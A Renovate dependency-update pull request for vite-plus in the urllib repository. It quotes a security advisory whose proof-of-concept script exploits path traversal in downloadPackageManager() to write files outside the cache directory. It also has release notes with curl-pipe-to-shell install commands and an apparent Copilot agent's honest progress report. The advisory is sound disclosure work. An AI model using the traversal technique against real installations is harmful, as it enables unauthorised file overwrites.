chore(deps): update dependency vite-plus to v0.1.18

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
vite-plus (source)	0.1.15 → 0.1.17

GitHub Vulnerability Alerts

GHSA-33r3-4whc-44c2

Summary

downloadPackageManager() in vite-plus/binding accepts an untrusted version string and uses it directly in filesystem paths. A caller can supply ../ segments to escape the VP_HOME/package_manager/<pm>/ cache root and cause Vite+ to delete, replace, and populate directories outside the intended cache location.

Details

The public vite-plus/binding export downloadPackageManager() forwards options.version directly into the Rust package-manager download flow without validating that it is a normal semver version.

That value is used as a path component when building the install location under VP_HOME. After the package is downloaded and extracted, Vite+:

1. computes the final target directory from the raw version string,
2. removes any pre-existing directory at that target,
3. renames the extracted package into that location, and
4. writes executable shim files there.

Because the CLI validates versions via semver::Version::parse() before calling this code, the protection that exists for normal vp create, vp migrate, and vp env flows does not apply to direct callers of the binding. A programmatic caller of vite-plus/binding can pass traversal strings such as ../../../escaped and break out of VP_HOME.

PoC

import fs from "node:fs";
import http from "node:http";
import os from "node:os";
import path from "node:path";
import { downloadPackageManager } from "vite-plus/binding";

const tgz = Buffer.from(
  "H4sIAH/B1GkC/+3NsQqDMBjE8W/uU4hTXUwU0/dJg0irTYLR9zftUnCWQvH/W+645aJ1ox16dX94FX181e6Z5GA6u3XdJ7N9at223/7em8YYI4WWH1jTYud8L+fkgk9h6uspDNcyjGV1EQAAAAAAAAAAAAAAAADAH9gAb+vJ9QAoAAA=",
  "base64",
);

const vpHome = fs.mkdtempSync(path.join(os.tmpdir(), "vp-home-"));
const version = "../../../vite-plus-escape";
const escapedRoot = path.resolve(vpHome, "package_manager", "pnpm", version);
const escapedInstallDir = path.join(escapedRoot, "pnpm");

process.env.VP_HOME = vpHome;

const server = http.createServer((req, res) => {
  res.writeHead(200, { "content-type": "application/octet-stream" });
  res.end(tgz);
});

await new Promise((resolve) => server.listen(0, "127.0.0.1", resolve));
const { port } = server.address();
process.env.npm_config_registry = `http://127.0.0.1:${port}`;

const result = await downloadPackageManager({
  name: "pnpm",
  version,
});

server.close();

console.log("VP_HOME =", vpHome);
console.log("installDir =", result.installDir);
console.log("escaped =", escapedInstallDir);
console.log("shim exists =", fs.existsSync(path.join(escapedInstallDir, "bin", "pnpm")));

// installDir is outside VP_HOME, and <escaped>/pnpm/bin/pnpm is created

Impact

A caller that can influence downloadPackageManager() input can escape the Vite+ cache directory and make the process overwrite attacker-chosen directories outside VP_HOME. When combined with the supported custom-registry override (npm_config_registry), this becomes attacker-controlled file write outside the intended install root.

Mitigating factors

• Normal CLI usage is not affected. All built-in CLI paths (vp create, vp migrate, vp env) validate the version string via semver::Version::parse() before it reaches downloadPackageManager().
• The vulnerability is only reachable by programmatic callers that import vite-plus/binding directly and pass an untrusted version string.
• No known downstream consumers pass untrusted input to this function.
• Exploitation requires the attacker to already be executing code in the same Node.js process.

Severity

• CVSS Score: 8.4 / 10 (High)
• Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

---

Release Notes

voidzero-dev/vite-plus (vite-plus)

v0.1.17: vite-plus v0.1.17 — Windows installer, Nushell, and safer upgrades

Compare Source

Broader platform reach with a standalone Windows installer and Nushell shell support.

Highlights

• Windows .exe installer — standalone vp-setup.exe now shipped as release asset for fully offline-friendly Windows installs (#​1293)
• Nushell support — new env.nu wrapper makes vp env work natively in Nushell (#​1312)
• Node.js compatibility guard — vp now blocks execution on incompatible Node.js versions instead of failing opaquely (#​1360)
• Safer global install & vp upgrade — hardened trampoline regeneration and overall upgrade path to avoid leaving partial installs behind (#​1338, #​1369)
• Cached vp check — task runner now caches vp check output for faster repeat runs (#​1328)

Features

• Add standalone Windows .exe installer (vp-setup.exe) (#​1293) — @​fengmk2
• Add Nushell support via env.nu wrapper (#​1312) — @​naokihaba
• Set npm.scriptRunner to vp in vp create scaffolds (#​1346) — @​jong-kyung
• Block vp commands when Node.js version is incompatible (#​1360) — @​liangmiQwQ
• Add vp node shorthand for vp env exec node (#​1359) — @​fengmk2
• Upgrade upstream toolchain — vite 8.0.8, vitest 4.1.4, rolldown 1.0.0-rc.15, tsdown 0.21.8, oxlint 1.60.0, oxfmt 0.45.0, oxc 0.124.0 (#​1334, #​1341, #​1352, #​1375) — @​Brooooooklyn

Fixes & Enhancements

• Add vp create e2e tests and fix yarn/bun migration bugs (#​1317) — @​fengmk2
• Resolve bin/oxfmt the same way as oxlint (#​1326) — @​leaysgur
• Enable cache support for vp check in task runner (#​1328) — @​fengmk2
• Consolidate agent instructions (#​1340) — @​cpojer
• Safer Vite+ global install and vp upgrade flow (#​1338) — @​kazupon
• Auto-fix git symlinks when core.symlinks is false (#​1353) — @​T4ko0522
• Add env.VP_VERSION for oxlint and oxfmt (#​946) — @​leaysgur
• Retry pnpm dedupe --check in CI to handle non-deterministic resolution (#​1365) — @​fengmk2
• Filter KeyEventKind on Windows so arrow-key navigation works correctly (#​1362) — @​fengmk2
• Remove unnecessary quotes from vitest-dev override in upgrade script (#​1368) — @​fengmk2
• Regenerate all trampoline .exe files after upgrade (#​1369) — @​fengmk2
• Reject non-semver package manager versions during install (#​1386) — @​fengmk2, reported by @​Jvr2022

Refactor

• Use rolldown's disable_panic_hook feature for panic hook (#​1330) — @​fengmk2
• Clean up footer (#​1342) — @​mdong1909
• Extract check command into its own module (#​1350) — @​fengmk2
• Split cli.rs into focused submodules (#​1351) — @​fengmk2

Docs

• Improve docs for vpx command (#​1303) — @​connorshea
• Fix dev mode docs (#​1343) — @​TheAlexLichter

Chore

• Use vp check instead of vp fmt && vp lint in monorepo template (#​1339) — @​fengmk2
• Renovate: ignore oxc/oxfmt/oxlint/tsgolint updates (#​1372) — @​camc314
• Update crate-ci/typos action to v1.45.1 (#​1376) — @​renovate[bot]

Published Packages

• @voidzero-dev/vite-plus-core@0.1.17
• @voidzero-dev/vite-plus-test@0.1.17
• vite-plus@0.1.17

Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Or download and run vp-setup.exe from the assets below.

Upgrade:

vp upgrade

New Contributors

Welcome to all new contributors! 🎉

@​T4ko0522

Full Changelog: voidzero-dev/vite-plus@v0.1.16...v0.1.17

v0.1.16: vite-plus v0.1.16 — Security patches, Volta migration and Windows fixes

Compare Source

A broad release focused on security and ecosystem compatibility: 3 Vite dev server security fixes, Volta migration support, Bun object-form workspaces, JFrog registry support, and a wave of Windows and shell fixes.

Highlights

• Security: 3 Vite dev server vulnerabilities patched — Vite 8.0.5 fixes arbitrary file read via WebSocket (CVE-2026-39363, High — vite#22159), server.fs.deny bypass with query parameters (CVE-2026-39364, High — vite#22160), and path traversal in optimized deps .map handling (CVE-2026-39365, Moderate — vite#22161)
• Volta node version migration — vp migrate now migrates Volta-managed Node.js versions to .node-version (#​1201)
• vp env off disables Node.js management globally — Disables Node.js management for all vp commands, not just the current shell (#​1255)
• Bun object-form workspace support — Workspaces defined as objects in package.json are now properly detected (#​1250)
• Windows install reliability — Fixed PowerShell install errors and scoped CI env vars to child processes (#​1284, #​1292)

Features

• Support volta node version migration to .node-version (#​1201) — @​naokihaba
• Make vp env off disable Node.js management for all vp commands (#​1255) — @​fengmk2
• Add explanations to migration prompts (#​1270) — @​hakshu25
• vp run --cache now supports running without a task specifier and opens the interactive task selector (vite-task#313) — @​HaasStefan

Fixes & Enhancements

• Support JFrog registry metadata JSON format (#​1249) — @​fengmk2
• Support Bun object-form workspaces in package.json (#​1250) — @​fengmk2
• Resolve latest to absolute latest Node.js version (#​1253) — @​fengmk2
• Use bin.js entry point for TypeScript loader in justfile (#​1252) — @​jong-kyung
• Replace deprecated @tanstack/create-start with @tanstack/cli (#​1259) — @​jong-kyung
• Include additional supported config types from lint-staged (#​1263) — @​porada
• Add vitest to devDependencies for peer dep resolution (#​1261) — @​fengmk2
• Do not treat lint warnings as errors in exit code (#​1268) — @​fengmk2
• Resolve tsgolint on Windows with bun package manager (#​1269) — @​fengmk2
• Bypass package manager release age gates during vp upgrade (#​1272) — @​kazupon
• Wrap zsh completion in eval for dash compatibility (#​1280) — @​shaneturner
• Write merged LICENSE directly instead of LICENSE.md (#​1281) — @​fengmk2
• Update .yarnrc template to use node_modules (#​1297) — @​rChaoz
• Scope CI env var to child process in Windows install script (#​1292) — @​fengmk2
• Correctly resolve tsgolint in yarn monorepo packages (#​1310) — @​rChaoz
• Override rolldown panic hook with vite-plus branding (#​1287) — @​fengmk2
• Fix PowerShell install errors on Windows (#​1284) — @​fengmk2

Refactor

• Use .ts import extensions (#​1274) — @​fengmk2
• Migrate CLI build from tsc+rolldown to tsdown (#​1276) — @​fengmk2
  Replaces the split build strategy (tsc for local CLI code + rolldown for global modules) with a unified tsdown configuration. All third-party deps are now inlined at build time, eliminating the rolldown.config.ts and its manual external/path-rewriting plugins. Runtime dependencies dropped from 10 → 6:

  	Before (v0.1.15)	After (v0.1.16)
  dependencies	10	6
  Removed	cac, cross-spawn, jsonc-parser, picocolors	(inlined by tsdown)

Docs

• Document aliased package update steps (#​1266) — @​fengmk2
• Add custom Node.js mirror docs and rename VITE_NODE_DIST_MIRROR to VP_NODE_DIST_MIRROR (#​1254) — @​kazupon
• Add info about bun as pkg manager (#​1294) — @​TheAlexLichter
• Improve docs for core commands (#​1304) — @​connorshea
• Soften troubleshooting claims around vite config loading (#​1313) — @​FleetAdmiralJakob
• Remove redirect (#​1306) — @​connorshea

Chore

• Upgrade upstream dependencies: oxc 0.123.0, rolldown 1.0.0-rc.13, vite 8.0.5, esbuild 0.28.0, TypeScript 6.0.2, sass 1.99.0, oxlint-tsgolint 0.20.0, rolldown-plugin-dts 0.23.2, @​vitejs/devtools 0.1.13, Vue 3.5.31 (#​1267, #​1279, #​1319) — @​Brooooooklyn
• Bump vite-task to 076cef4 (#​1320) — @​fengmk2
• Use matchDepNames for vite-task crates in renovate config (#​1217) — @​fengmk2
• Clarify Node.js version management prompt (#​1273) — @​fengmk2
• Update crate-ci/typos action to v1.45.0 (#​1262)

Published Packages

• @voidzero-dev/vite-plus-core@0.1.16
• @voidzero-dev/vite-plus-test@0.1.16
• vite-plus@0.1.16

Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Upgrade:

vp upgrade

New Contributors

Welcome to all new contributors! 🎉

@​porada, @​hakshu25, @​shaneturner, @​rChaoz, @​FleetAdmiralJakob

Full Changelog: voidzero-dev/vite-plus@v0.1.15...v0.1.16

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[pkg-pr-new]

Open in StackBlitz

npm i https://pkg.pr.new/node-modules/urllib@746

commit: 8659e66

[socket-security]

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	@​voidzero-dev/​vite-plus-test@​0.1.15 ⏵ 0.1.18				+1
	vite-plus@​0.1.15 ⏵ 0.1.18		+16		+1

View full report

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 94.60%. Comparing base (ca63296) to head (8659e66).
⚠️ Report is 1 commits behind head on master.

Additional details and impacted files

@@           Coverage Diff           @@
##           master     #746   +/-   ##
=======================================
  Coverage   94.60%   94.60%           
=======================================
  Files          10       10           
  Lines         723      723           
  Branches      226      226           
=======================================
  Hits          684      684           
  Misses         36       36           
  Partials        3        3           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[fengmk2]

@copilot update to 0.1.18 and fix ci https://github.com/node-modules/urllib/actions/runs/24501177371/job/71608054589?pr=746

[renovate]

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.

[Copilot]

@copilot update to 0.1.18 and fix ci https://github.com/node-modules/urllib/actions/runs/24501177371/job/71608054589?pr=746

Updated in 8659e66: bumped vite-plus to 0.1.18, aligned vitest alias and pnpm.overrides to ^0.1.18, and refreshed the lockfile. I also verified pnpm dedupe --check now passes locally (the CI failure in job 71608054589 was lockfile dedupe drift).

Warning

Firewall rules blocked me from connecting to one or more addresses (expand for details)

I tried to connect to the following addresses, but was blocked by firewall rules:

• http://registry.npmjs.org:80/urllib/latest
  • Triggering command: /opt/hostedtoolcache/node/24.14.1/x64/bin/node /opt/hostedtoolcache/node/24.14.1/x64/bin/node --experimental-import-meta-resolve --require /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.17_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__c63e9fedb3345cc7c548c0fde72d9335/node_modules/@voidzero-dev/vite-plus-test/suppress-warnings.cjs --conditions node --conditions development /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.17_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__c63e9fedb3345cc7c548c0fde72d9335/node_modules/@voidzero-dev/vite-plus-test/dist/workers/forks.js (http block)
  • Triggering command: /opt/hostedtoolcache/node/24.14.1/x64/bin/node /opt/hostedtoolcache/node/24.14.1/x64/bin/node --experimental-import-meta-resolve --require /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.18_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__b160f0c512ba80464b274da6bf33fc59/node_modules/@voidzero-dev/vite-plus-test/suppress-warnings.cjs --conditions node --conditions development /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.18_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__b160f0c512ba80464b274da6bf33fc59/node_modules/@voidzero-dev/vite-plus-test/dist/workers/forks.js (http block)
• registry.npmmirror.com
  • Triggering command: /opt/hostedtoolcache/node/24.14.1/x64/bin/node /opt/hostedtoolcache/node/24.14.1/x64/bin/node --experimental-import-meta-resolve --require /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.17_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__c63e9fedb3345cc7c548c0fde72d9335/node_modules/@voidzero-dev/vite-plus-test/suppress-warnings.cjs --conditions node --conditions development /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.17_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__c63e9fedb3345cc7c548c0fde72d9335/node_modules/@voidzero-dev/vite-plus-test/dist/workers/forks.js (dns block)
  • Triggering command: /opt/hostedtoolcache/node/24.14.1/x64/bin/node /opt/hostedtoolcache/node/24.14.1/x64/bin/node --experimental-import-meta-resolve --require /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.18_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__b160f0c512ba80464b274da6bf33fc59/node_modules/@voidzero-dev/vite-plus-test/suppress-warnings.cjs --conditions node --conditions development /home/REDACTED/work/urllib/urllib/node_modules/.pnpm/@voidzero-dev+vite-plus-test@0.1.18_@arethetypeswrong+core@0.18.2_@types+node@22.19.15__b160f0c512ba80464b274da6bf33fc59/node_modules/@voidzero-dev/vite-plus-test/dist/workers/forks.js (dns block)

If you need me to access, download, or install something from one of these locations, you can either:

• Configure Actions setup steps to set up my environment, which run before the firewall is enabled
• Add the appropriate URLs or hosts to the custom allowlist in this repository's Copilot coding agent settings (admins only)